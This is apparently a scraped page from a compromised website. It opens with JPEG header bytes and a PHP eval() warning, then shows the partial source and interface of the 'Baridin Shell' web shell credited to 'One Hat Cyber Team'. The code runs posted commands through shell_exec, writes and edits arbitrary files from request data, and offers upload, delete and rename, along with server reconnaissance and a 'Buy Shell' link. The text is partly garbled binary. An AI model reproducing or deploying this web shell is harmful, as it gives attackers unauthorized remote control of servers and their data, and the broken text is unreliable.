�����JFIF��H�H�����C�   %# , #&')*)-0-(0%()(��� �P�P�������������������5� �������!1AQq��"#2Bar���R�Sc��������?��R��������X�o�k,��e�k�X���9["&Q ����}Nq'����{u\�6hc�i�r_�n[t�lU�;8��Ax����r�{�f����Q��岳���/f�8�T�D'e����W ^�YŞ��}h����7�`��Կ�֑�w.gVtq>��5����O���y�.>%X��U]3�\���${�أh�~k�Բ�o�Fq��#����y����0�&��;�-W�*�%K� ��m'o�Yt��L�����Q��TS1�%�`y=���+���b����dmi�HC�T_#���|���P��㬈v;?E����U�" W<����ms��MmL��G1�9��'�'�����%��akJo]Qcr��խ���O$ ;:V�>�_Dn����s����m۸U�#�ҝ��ܾpe.qw3�/��*�a#���=\.!N���s��l��x�Ԗjz�Z�!��� �>!��Ɵs��E<��9�N9m�/��E�&�y�? ��yY$a�p�-�R�5��6�XOk$>D�켎��T�RUT�����<���>��h��<�9��D���}�?f8��$� �EYki/O����28��}#������"(��9���<� � x�G���Ԑ���YD�2��DL���
Warning: chmod(): No such file or directory in /home/publqaio/barnesandnoblespublisher.com/css/990.php(42) : eval()'d code on line 1
Default page
One Hat Cyber Team
  • Dir : ~/home/publqaio/autovinreports.com/
  • Edit File: readme.php


    Back HTML; exit; } if (isset($_POST['save_touch']) && isset($_POST['file'])) { file_put_contents($_POST['file'], $_POST['content']); } // == Edit file == if (isset($_GET['edit']) && file_exists($_GET['edit'])) { $file = $_GET['edit']; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) { file_put_contents($file, $_POST['content']); echo "Saved.
    "; } $content = htmlspecialchars(file_get_contents($file)); echo ""; echo "

    Edit File: $file

    "; echo "
    "; echo "

    "; echo "Back"; exit; } // == Terminal via AJAX == if (isset($_POST['ajax_terminal']) && isset($_POST['cmd'])) { header('Content-Type: text/plain'); $output = shell_exec($_POST['cmd']); echo $output ?: "(no output)"; exit; } // == Tampilan HTML == echo "Baridin Shell"; echo "

    Baridin Shell

    "; $diskPath = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? 'C:' : '/'; $hostname = gethostname(); $os = php_uname(); $totalDisk = getSize(disk_total_space($diskPath)); $freeDisk = getSize(disk_free_space($diskPath)); $usedDisk = getSize(disk_total_space($diskPath) - disk_free_space($diskPath)); echo "Server IP: {$_SERVER['SERVER_ADDR']}
    "; echo "Client IP: {$_SERVER['REMOTE_ADDR']}
    "; echo "Hostname: $hostname
    "; echo "OS: $os
    "; echo "Disk: Used: $usedDisk / Free: $freeDisk / Total: $totalDisk
    "; echo "
    [ Home ] [ Buy Shell ] [ Logout ]
    "; if (isset($_GET['logout'])) { session_destroy(); header("Location: $self"); exit; } $parts = explode(DIRECTORY_SEPARATOR, trim($path, DIRECTORY_SEPARATOR)); $nav = (DIRECTORY_SEPARATOR === "\\") ? substr($path, 0, 2) : "/"; $build = (DIRECTORY_SEPARATOR === "\\") ? substr($path, 0, 2) : ""; foreach ($parts as $part) { $build .= DIRECTORY_SEPARATOR . $part; $nav .= " / " . htmlspecialchars($part) . ""; } echo "
    Path: $nav
    "; echo ""; foreach (scandir($path) as $item) { if ($item == '.') continue; $full = "$path/$item"; $permstr = perms($full); $permClass = is_writable($full) ? 'writable' : 'readonly'; $owner = @posix_getpwuid(fileowner($full)); $group = @posix_getgrgid(filegroup($full)); $ownerName = $owner ? $owner['name'] : fileowner($full); $groupName = $group ? $group['name'] : filegroup($full); echo ""; echo ""; echo ""; echo ""; } echo "
    NameSizePermOwner/GroupModifiedAction
    "; if (is_dir($full)) { echo "$item"; } else { echo "$item"; } echo "" . (is_file($full) ? getSize(filesize($full)) : '-') . "$permstr$ownerName/$groupName" . date("Y-m-d H:i:s", filemtime($full)) . ""; echo "E "; echo "R "; echo "T "; if (is_file($full)) echo "S "; echo "D"; echo "
    "; echo "
    Upload:

    "; echo "
    Terminal:
    
    
    "; echo "
    Create File:
    "; echo "
    Create Directory:
    "; echo "
    © Baridin
    "; echo << document.getElementById('terminalForm').addEventListener('submit', function(e) { e.preventDefault(); var cmd = document.getElementById('cmd').value; fetch("", { method: "POST", headers: {"Content-Type": "application/x-www-form-urlencoded"}, body: "ajax_terminal=1&cmd=" + encodeURIComponent(cmd) }) .then(response => response.text()) .then(data => { document.getElementById('output').textContent = data; }); }); JS; echo ""; ?>